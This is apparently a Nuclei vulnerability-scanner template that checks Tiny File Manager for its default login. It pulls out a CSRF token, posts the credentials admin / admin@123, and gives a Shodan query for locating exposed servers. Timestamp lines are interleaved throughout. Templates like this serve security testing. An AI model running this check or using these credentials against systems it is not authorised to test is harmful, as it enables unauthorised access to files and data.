2022-12-09 08:27:12 +00:00
id : tiny-filemanager-default-login
2022-12-08 20:04:09 +00:00
info :
2023-01-16 17:41:15 +00:00
name : Tiny File Manager - Default Login
2022-12-08 20:04:09 +00:00
author : shelled
severity : high
2023-01-16 17:41:15 +00:00
description : Tiny File Manager contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
2022-12-08 20:04:09 +00:00
reference :
- https://github.com/prasathmani/tinyfilemanager
2022-12-09 08:27:12 +00:00
- https://tinyfilemanager.github.io/docs/
2023-01-16 17:41:15 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score : 8.3
cwe-id : CWE-522
2022-12-09 08:27:12 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 3
2022-12-09 08:27:12 +00:00
shodan-query : html:"Tiny File Manager"
tags : default-login,tiny,filemanager
2022-12-08 20:04:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-12-08 20:04:09 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
fm_usr={{user}}&fm_pwd={{pass}}&token={{token}}
- |
2022-12-09 08:27:12 +00:00
GET /?p= HTTP/1.1
2022-12-08 20:04:09 +00:00
Host : {{Hostname}}
attack : pitchfork
payloads :
user :
- admin
pass :
- admin@123
2022-12-09 08:27:12 +00:00
skip-variables-check : true
host-redirects : true
max-redirects : 2
2023-10-14 11:27:55 +00:00
2022-12-08 20:04:09 +00:00
matchers-condition : and
matchers :
- type : word
words :
- 'admin'
- 'You are logged in'
- 'Tiny File Manager'
2022-12-09 08:27:12 +00:00
condition : and
- type : status
status :
- 200
extractors :
- type : regex
name : token
part : body
regex :
- '([a-f0-9]{64})'
internal : true
2023-11-27 09:19:41 +00:00
# digest: 490a0046304402203a6d1f960ddfa4db3523830d956bd204b0b45293b82f04cfb4f9ef2e12197d19022027eb9849b05622c8350ed6179482e038a785a90d0748cf23625e223b85395479:922c64590222798bb761d5b6d8e72950